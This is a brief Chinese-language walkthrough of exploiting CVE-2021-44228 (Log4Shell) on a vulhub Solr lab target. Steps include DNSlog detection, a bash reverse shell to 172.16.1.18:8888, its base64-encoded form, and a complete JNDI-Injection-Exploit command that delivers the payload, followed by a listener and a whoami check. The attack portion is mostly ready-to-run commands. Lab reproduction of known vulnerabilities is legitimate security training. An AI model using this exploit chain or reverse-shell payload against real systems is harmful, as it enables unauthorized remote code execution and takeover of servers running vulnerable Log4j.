1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令

2.发现端口是8983,浏览器访问http://172.16.1.18:8983/

3.用dnslog平台检测dns回显,看看有没有漏洞存在


4.反弹shell到kali(ip为172.16.1.18)的8888端口
bash -i >& /dev/tcp/172.16.1.18/8888 0>&1
然后对上述命令进行base64编码,
YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=
最终 Payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMS4xOC84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "172.16.1.18"

同时,我们开启对172.16.1.18:8888端口监听

输入whoami命令查看是否获得shell
